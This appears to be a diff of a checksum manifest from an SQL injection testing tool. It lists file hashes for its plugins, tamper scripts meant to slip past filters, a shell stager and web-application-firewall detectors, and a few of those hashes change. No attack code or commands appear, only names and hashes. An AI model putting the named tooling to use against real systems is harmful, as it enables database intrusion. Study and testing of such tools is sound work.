34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py
e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py
554f925e0a66f62b8ba39dd6c95d1e7f plugins/generic/databases.py dc07665887191ac977e5377f5a66d288 plugins/generic/databases.py
764a8fd5a99224910885c6b94a592170 plugins/generic/entries.py 1db2e179c19e8a38e0ef5075363eb32f plugins/generic/entries.py
d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py
ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py
f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py
1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py
f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py
@ -229,7 +229,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_
4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py
d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py
0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py
55e9fbe57967e57a05a8ca77c312dc70 tamper/between.py 4d44f868c6c97ced29e306347ce5d650 tamper/between.py
e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py
e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py
3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py
@ -244,7 +244,7 @@ dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py
4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py
25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py 25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py
9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py 9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py
838212f289632526777b7224bf8aacf9 tamper/ifnull2casewhenisnull.py 3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py
e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py
91c92ee203e7e619cb547643883924ca tamper/informationschemacomment.py 91c92ee203e7e619cb547643883924ca tamper/informationschemacomment.py
1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py
@ -427,7 +427,7 @@ ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py
166eb53544536e3e86223d513b8b688d waf/proventia.py 166eb53544536e3e86223d513b8b688d waf/proventia.py
78a40eca7ddd14c4eaf911de7748b487 waf/radware.py 78a40eca7ddd14c4eaf911de7748b487 waf/radware.py
f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py
022956799ff08db1a39fe1484d949e54 waf/safe3.py acb82b21f4032ceb510a58142add02ab waf/safe3.py
67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py 67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py
d1b67820442199181815ec3fce27e582 waf/secureiis.py d1b67820442199181815ec3fce27e582 waf/secureiis.py
34f0ec775835744bed601ef7c7a21c9d waf/senginx.py 34f0ec775835744bed601ef7c7a21c9d waf/senginx.py


@ -23,4 +23,3 @@ def detect(get_page):
break break
return retval return retval